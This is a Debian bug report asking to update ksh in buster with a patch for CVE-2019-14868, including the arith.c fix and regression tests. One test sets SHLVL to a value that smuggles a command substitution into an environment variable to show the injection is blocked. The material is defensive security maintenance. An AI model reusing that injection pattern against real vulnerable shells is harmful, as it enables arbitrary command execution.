Bug#964986: buster-pu: package ksh/93u+20120801-3.4

To: submit@bugs.debian.org
Subject: Bug#964986: buster-pu: package ksh/93u+20120801-3.4
From: Anuradha Weeraman <anuradha@debian.org>
Date: Mon, 13 Jul 2020 18:56:27 -0400
Message-id: <[🔎] 20200713225627.GB816226@ninsei.weeraman.com>
Reply-to: Anuradha Weeraman <anuradha@debian.org>, 964986@bugs.debian.org

Package: release.debian.org
Severity: normal
Tags: buster
User: release.debian.org@packages.debian.org
Usertags: pu
X-Debbugs-Cc: anuradha@debian.org, carnil@debian.org

[ Reason ]
Summary of the issue: In ksh version 20120801, a flaw was found in the
way it evaluates certain environment variables. An attacker could use
this flaw to override or bypass environment restrictions to execute
shell commands.

[ Impact ]
Services and applications that allow remote unauthenticated
attackers to provide one of those environment variables could allow them
to exploit this issue remotely, although the risk is deemed low.

[ Tests ]
There is a test included in the diff that was used to validate the
fix. Also, the regression test suite was run to make sure there were
no regressions.

[ Risks ]
The regression test suite has been run before and after the patch to
confirm no new regressions. Also, the fix is applied in unstable with no
new issues reported.

[ Checklist ]
[X] *all* changes are documented in the d/changelog
[X] I reviewed all changes and I approve them
[X] attach debdiff against the package in (old)stable
[X] the issue is verified as fixed in unstable

[ Changes ]
* Patch to arith.c that fixes the CVE
* Test case for the fix

[ Other info ]
This was brought up to the security team first, and it was deemed that a
DSA is not required by Salvatore Bonaccorso.

Anuradha

-- System Information:
Debian Release: bullseye/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

diff -Nru ksh-93u+20120801/debian/changelog ksh-93u+20120801/debian/changelog
--- ksh-93u+20120801/debian/changelog	2018-12-14 02:26:58.000000000 -0500
+++ ksh-93u+20120801/debian/changelog	2020-07-12 11:26:07.000000000 -0400
@@ -1,3 +1,15 @@
+ksh (93u+20120801-4+deb10u1) buster-security; urgency=high
+
+  * Fix for CVE-2019-14868: in ksh version 20120801, a flaw was found
+    in the way it evaluates certain environment variables. An attacker
+    could use this flaw to override or bypass environment restrictions
+    to execute shell commands. Services and applications that allow
+    remote unauthenticated attackers to provide one of those
+    environment variables could allow them to exploit this issue
+    remotely. (Closes: #948989)
+
+ -- Anuradha Weeraman <anuradha@debian.org>  Sun, 12 Jul 2020 11:26:07 -0400
+
 ksh (93u+20120801-3.4) unstable; urgency=medium
 
   [ Boyuan Yang ]
diff -Nru ksh-93u+20120801/debian/patches/cve-2019-14868.patch ksh-93u+20120801/debian/patches/cve-2019-14868.patch
--- ksh-93u+20120801/debian/patches/cve-2019-14868.patch	1969-12-31 19:00:00.000000000 -0500
+++ ksh-93u+20120801/debian/patches/cve-2019-14868.patch	2020-07-12 11:26:07.000000000 -0400
@@ -0,0 +1,97 @@
+Description: CVE-2019-14868
+ Certain environment variables were interpreted as arithmetic
+ expressions on startup, leading to code injection.
+Bug-Debian: https://bugs.debian.org/948989
+Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=1757324
+Author: Kurtis Rader <krader@skepticism.us>
+Origin: https://github.com/ksh93/ksh/commit/593a5a8b7f272c2488c8a800820ae990942946e7
+Date: 2020-05-21
+
+diff --git a/src/cmd/ksh93/sh/arith.c b/src/cmd/ksh93/sh/arith.c
+index b1059421..6361431b 100644
+--- a/src/cmd/ksh93/sh/arith.c
++++ b/src/cmd/ksh93/sh/arith.c
+@@ -513,21 +513,36 @@ Sfdouble_t sh_strnum(register const char *str, char** ptr, int mode)
+ 	char base=(shp->inarith?0:10), *last;
+ 	if(*str==0)
+ 	{
+-		if(ptr)
+-			*ptr = (char*)str;
+-		return(0);
+-	}
+-	errno = 0;
+-	d = strtonll(str,&last,&base,-1);
+-	if(*last || errno)
+-	{
+-		if(!last || *last!='.' || last[1]!='.')
+-			d = strval(shp,str,&last,arith,mode);
+-		if(!ptr && *last && mode>0)
+-			errormsg(SH_DICT,ERROR_exit(1),e_lexbadchar,*last,str);
++		d = 0.0;
++		last = (char*)str;
++	} else {
++		errno = 0;
++		d = strtonll(str,&last,&base,-1);
++		if (*last && !shp->inarith && sh_isstate(SH_INIT)) {
++			/* This call is to handle "base#value" literals if we're importing untrusted env vars. */
++			errno = 0;
++			d = strtonll(str, &last, NULL, -1);
++		}
++
++		if(*last || errno)
++		{
++			if (sh_isstate(SH_INIT)) {
++				/*
++				 * Initializing means importing untrusted env vars. The string does not appear to be
++				 * a recognized numeric literal, so give up. We can't safely call strval(), because
++				 * that allows arbitrary expressions, causing security vulnerability CVE-2019-14868.
++				 */
++				d = 0.0;
++			} else {
++				if(!last || *last!='.' || last[1]!='.')
++					d = strval(shp,str,&last,arith,mode);
++				if(!ptr && *last && mode>0)
++					errormsg(SH_DICT,ERROR_exit(1),e_lexbadchar,*last,str);
++			}
++		} else if (!d && *str=='-') {
++			d = -0.0;
++		}
+ 	}
+-	else if (!d && *str=='-')
+-		d = -0.0;
+ 	if(ptr)
+ 		*ptr = last;
+ 	return(d);
+diff --git a/src/cmd/ksh93/tests/variables.sh b/src/cmd/ksh93/tests/variables.sh
+index 6eec31b6..9ceb2d1b 100755
+--- a/src/cmd/ksh93/tests/variables.sh
++++ b/src/cmd/ksh93/tests/variables.sh
+@@ -674,4 +674,28 @@ level=$($SHELL -c $'$SHELL -c \'print -r "$SHLVL"\'')
+ $SHELL -c 'unset .sh' 2> /dev/null
+ [[ $? == 1 ]] || err_exit 'unset .sh should return 1'
+ 
++# ======
++# Verify that importing untrusted environment variables does not allow evaluating
++# arbitrary expressions, but does recognize all integer literals recognized by ksh.
++
++expect=8
++actual=$(env SHLVL='7' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "decimal int literal not recognized (expected '$expect', got '$actual')"
++
++expect=14
++actual=$(env SHLVL='013' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "leading zeros int literal not recognized (expected '$expect', got '$actual')"
++
++expect=4
++actual=$(env SHLVL='2#11' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "base#value int literal not recognized (expected '$expect', got '$actual')"
++
++expect=12
++actual=$(env SHLVL='16#B' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "base#value int literal not recognized (expected '$expect', got '$actual')"
++
++expect=1
++actual=$(env SHLVL="2#11+x[\$(env echo Exploited vuln CVE-2019-14868 >&2)0]" "$SHELL" -c 'echo $SHLVL' 2>&1)
++[[ $actual == $expect ]] || err_exit "expression allowed on env var import (expected '$expect', got '$actual')"
++
+ exit $((Errors<125?Errors:125))
diff -Nru ksh-93u+20120801/debian/patches/series ksh-93u+20120801/debian/patches/series
--- ksh-93u+20120801/debian/patches/series	2018-12-14 02:26:58.000000000 -0500
+++ ksh-93u+20120801/debian/patches/series	2020-07-12 11:26:07.000000000 -0400
@@ -7,3 +7,4 @@
 ed.patch
 0008-Bug-887743-Fix-build-failures-caused-by-update-in-gl.patch
 bug915326.patch
+cve-2019-14868.patch

Attachment: signature.asc
Description: PGP signature

Reply to:

Follow-Ups:
- Bug#964986: buster-pu: package ksh/93u+20120801-3.4
  - From: Salvatore Bonaccorso <carnil@debian.org>
- Processed: Re: Bug#964986: buster-pu: package ksh/93u+20120801-3.4
  - From: "Debian Bug Tracking System" <owner@bugs.debian.org>
- Bug#964986: ksh 93u+20120801-3.4+deb10u1 flagged for acceptance
  - From: Adam D Barratt <adam@adam-barratt.org.uk>

Prev by Date: Bug#964482: marked as done (buster-pu: package xen/4.11.4+24-gddaaccbbab-1~deb10u1)
Next by Date: Bug#964986: buster-pu: package ksh/93u+20120801-3.4
Previous by thread: Bug#962674: marked as done (stretch-pu: package ca-certificates/20200611~deb9u1)
Next by thread: Bug#964986: buster-pu: package ksh/93u+20120801-3.4
Index(es):
- Date
- Thread